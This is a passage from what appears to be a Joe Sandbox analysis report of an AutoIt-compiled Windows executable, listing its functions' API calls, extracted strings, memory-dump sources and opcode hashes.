                                                                                                                                                  • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                  • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                                  • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                  • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                                                  Function 00A71130 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                  Function 0048356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0048364B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharUpperVisibleWindow
                                                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                  • API String ID: 4105515805-45149045
                                                                                                                                                  • Opcode ID: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                                                                                                                                  • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                                                                                                                                                  • Opcode Fuzzy Hash: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                                                                                                                                  • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
                                                                                                                                                  Function 0048A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0048A630
                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0048A66D
                                                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0048A696
                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                                                                                                                                                  • GetSysColor.USER32(00000010), ref: 0048A6C9
                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0048A6E6
                                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 0048A763
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                                                                                                                                                    • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                                                                                                                                                    • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                                                                                    • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                                                                                    • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                                                                                    • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                                                                                                                                                    • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                                                                                    • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                                                                                    • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                                                                                    • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                                                                                    • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                                                                                    • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                                                                                    • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                                                                                    • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3521893082-0
                                                                                                                                                  • Opcode ID: 6e91d171cf065a250873850148fbfb75f7cc15900c33b280261b9dfca8494969
                                                                                                                                                  • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                                                                                                                                                  • Opcode Fuzzy Hash: 6e91d171cf065a250873850148fbfb75f7cc15900c33b280261b9dfca8494969
                                                                                                                                                  • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                                                                                                                                                  Function 00402C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00402CE8
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00402CF3
                                                                                                                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                                                                                                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                                                                                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                                                                                                                                                    • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                                                                                                  • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                                                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 464785882-4108050209
                                                                                                                                                  • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                                                                                                  • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                                                                                                                                                  • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                                                                                                  • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                                                                                                                                                  Function 004774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 004774DE
                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                                                                                                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0047763F
                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004776A2
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 004776C8
                                                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004777A6
                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                                                  • Opcode ID: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
                                                                                                                                                  • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                                                                                                                                                  • Opcode Fuzzy Hash: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
                                                                                                                                                  • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                                                                                                                                                  Function 0046AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                                                  • Opcode ID: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
                                                                                                                                                  • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                                                                                                                                                  • Opcode Fuzzy Hash: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
                                                                                                                                                  • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                                                                                                                                                  Function 004068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                  • API String ID: 1038674560-86951937
                                                                                                                                                  • Opcode ID: 91910eb341abf589b18a8827fbd5de9ccb9f4f90845a8da4aca72790487ce893
                                                                                                                                                  • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                                                                                                                                                  • Opcode Fuzzy Hash: 91910eb341abf589b18a8827fbd5de9ccb9f4f90845a8da4aca72790487ce893
                                                                                                                                                  • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                                                                                                                                                  Function 0048A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 0048A903
                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                                                                                                                                  • GetSysColor.USER32(00000011), ref: 0048A945
                                                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                                                                                                                                  • GetSysColor.USER32(00000011), ref: 0048AA4B
                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                                                                                                                                  • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0048AA89
                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0048AA8F
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0048AA94
                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1996641542-0
                                                                                                                                                  • Opcode ID: 9f9ff994320009f47fa3ebfc46be69792ddda53036695cf8c0c8eb91f145c6fb
                                                                                                                                                  • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                                                                                                                                                  • Opcode Fuzzy Hash: 9f9ff994320009f47fa3ebfc46be69792ddda53036695cf8c0c8eb91f145c6fb
                                                                                                                                                  • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                                                                                                                                                  Function 004889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                                                                                                                                  • CharNextW.USER32(0000014E), ref: 00488B01
                                                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                                                                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                                                                                                                                                  • _memset.LIBCMT ref: 00488C44
                                                                                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                                                                                                                                                  • _memset.LIBCMT ref: 00488CEC
                                                                                                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                                                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                                                                                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                                                                                                                                                  • DrawMenuBar.USER32(?), ref: 00488EC3
                                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 1073566785-4108050209
                                                                                                                                                  • Opcode ID: ab04cc0916547e3056cdb08d486fab66b59399e9446ef2c0650d6353511c45cf
                                                                                                                                                  • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                                                                                                                                                  • Opcode Fuzzy Hash: ab04cc0916547e3056cdb08d486fab66b59399e9446ef2c0650d6353511c45cf
                                                                                                                                                  • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                                                                                                                                                  Function 0048488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 004849CA
